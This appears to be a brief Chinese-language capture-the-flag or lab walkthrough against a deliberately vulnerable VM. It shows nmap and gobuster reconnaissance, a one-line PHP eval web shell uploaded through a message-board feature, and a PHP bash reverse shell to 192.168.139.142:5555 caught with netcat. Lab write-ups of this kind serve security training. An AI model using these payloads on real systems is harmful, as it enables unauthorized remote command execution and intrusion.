1.安装靶机，并在虚拟机打开，确保和kali在同一个NAT网段

2.使用kali来确定该靶机的IP

nmap -O 192.168.139.1/24

3.访问该IP192.168.139.171

4.访问robots.txt

5.扫描目录

gobuster dir -u http://192.168.139.171 -x php,bak,txt,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

6.依次访问，发现留言板功能

7.抓包查看

8.发现上传到了graffiti.txt内，尝试上传一句话木马

<?php eval($_POST[cmd]);?>

9.放行，然后用蚁剑进行连接

10.上传反弹shell的php文件

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.139.142/5555 0>&1'");?>

11.浏览器访问shell.php

kali ： nc监听5555端口